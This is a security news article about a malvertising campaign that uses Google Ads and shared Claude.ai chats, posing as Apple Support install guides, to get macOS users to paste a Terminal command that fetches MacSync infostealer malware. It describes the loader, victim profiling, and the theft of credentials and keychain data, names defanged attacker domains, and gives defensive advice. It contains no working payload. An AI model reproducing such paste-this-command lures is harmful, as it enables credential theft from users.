Currently, attackers are running a malvertising campaign that uses Google Ads and legitimate shared chats on Claude.ai spread macos information-stealing malware. The campaign was identified by Berk Albayrak, security engineer at Trendyol Group, and BleepingComputer independently confirmed a second active version using different infrastructure.
Users searching “download claude mac” You may see sponsored search results from Google directing you to Claude.ai and the URL may appear legitimate. These links lead to publicly shared Claude chats that appear as official “Claude Code on Mac” installation guides, supposedly from Apple Support. The chats instruct users to open Terminal and paste a command, which then silently downloads and executes the malware.
At the time of writing, two separate shared chats of Claude involved in this attack were publicly accessible, each using different domains and payloads, but sharing an identical social engineering approach.
How the Claude.ai malvertising attack works
The pasted command downloads a base64-encoded shell script from attacker-controlled domains. One version, marked by BleepingComputer, retrieves a script called loader.sh from bernasibutuwqu2(.)com, while another, identified by Albayrak, uses customroofingcontractors(.)com.
This loader runs entirely in memory, meaning it leaves minimal traces on disk. The server delivers a unique, obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based detection much more difficult.
In one variant, attackers profile victims before sending the main payload:
- Check if the machine has Russian or CIS region keyboard input sources configured. If so, the script exits and sends a cis_blocked status ping to the attacker’s server.
- It also collects the external IP address, hostname, operating system version, and keyboard locale, which it then transmits to the attacker.
- It then downloads a second-stage payload that runs through osascript, macOS’s built-in scripting engine. This allows the attacker to execute remote code without dropping a traditional binary.
The variant flagged by Albayrak skips the profiling step and goes directly to execution. It collects browser credentials, cookies, and macOS keychain contents and then extracts this data to the attacker’s server. Albayrak identified this variant as part of the MacSync macOS family of information stealers.
Why this Claude.ai malware campaign is harder to detect
Most malvertising campaigns are based on lookalike domains that imitate the real product website. In this case, the campaign uses the legitimate domain claude.ai, as the malicious instructions are hosted on Claude’s shared chat feature.
There is no fake URL that can be considered suspicious and the service destination shown in the Google ad appears genuine. A similar campaign exploiting ChatGPT and Grok shared chats was reported in December.
How to Avoid Fake Claude Installation Malware
Avoid clicking on sponsored search results when searching for software downloads. Instead, go directly to claude.ai to access the official Claude app. Be careful with any instructions that ask you to paste terminal commands, no matter where they appear.
The legitimate Claude Code CLI is available through the official Anthropic documentation and does not require pasting commands from a chat interface.
If a shared Claude chat asks you to run terminal commands attributed to support, treat it as malicious.
BleepingComputer contacted Anthropic and Google for comment before publishing. Neither company has issued a public statement regarding the misuse of shared chats and ad placement at this time.
